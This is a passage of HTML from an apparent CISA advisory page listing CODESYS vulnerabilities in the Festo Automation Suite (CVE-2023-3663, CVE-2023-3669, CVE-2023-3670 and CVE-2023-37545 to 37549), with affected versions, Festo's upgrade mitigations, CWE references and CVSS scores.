<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-3663</a></h3>
<div class="csaf-accordion-content">
<p>In CODESYS Development System versions from 3.5.11.20 and before 3.5.19.20 a missing integrity check might allow an unauthenticated remote attacker to manipulate the content of notifications received via HTTP by the CODESYS notification server.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-3663">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/940.html">CWE-940 Improper Verification of Source of a Communication Channel</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-3669</a></h3>
<div class="csaf-accordion-content">
<p>A missing Brute-Force protection in CODESYS Development System prior to 3.5.19.20 allows a local attacker to have unlimited attempts of guessing the password within an import dialog.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-3669">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/307.html">CWE-307 Improper Restriction of Excessive Authentication Attempts</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.3</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-3670</a></h3>
<div class="csaf-accordion-content">
<p>In CODESYS Development System 3.5.9.0 to 3.5.17.0 and CODESYS Scripting 4.0.0.0 to 4.1.0.0 unsafe directory permissions would allow an attacker with local access to the workstation to place potentially harmful and disguised scripts that could be executed by legitimate users.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-3670">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/668.html">CWE-668 Exposure of Resource to Wrong Sphere</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.3</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-37545</a></h3>
<div class="csaf-accordion-content">
<p>In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37546, CVE-2023-37547, CVE-2023-37548, CVE-2023-37549, CVE-2023-37550</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-37545">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-37546</a></h3>
<div class="csaf-accordion-content">
<p>In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37545, CVE-2023-37547, CVE-2023-37548, CVE-2023-37549 and CVE-2023-37550</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-37546">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-37547</a></h3>
<div class="csaf-accordion-content">
<p>In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37545, CVE-2023-37546, CVE-2023-37548, CVE-2023-37549 and CVE-2023-37550</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-37547">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-37548</a></h3>
<div class="csaf-accordion-content">
<p>In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37545, CVE-2023-37546, CVE-2023-37547, CVE-2023-37549 and CVE-2023-37550</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-37548">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-37549</a></h3>
<div class="csaf-accordion-content">
<p>In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37545, CVE-2023-37546, CVE-2023-37547, CVE-2023-37548 and CVE-2023-37550</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-37549">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
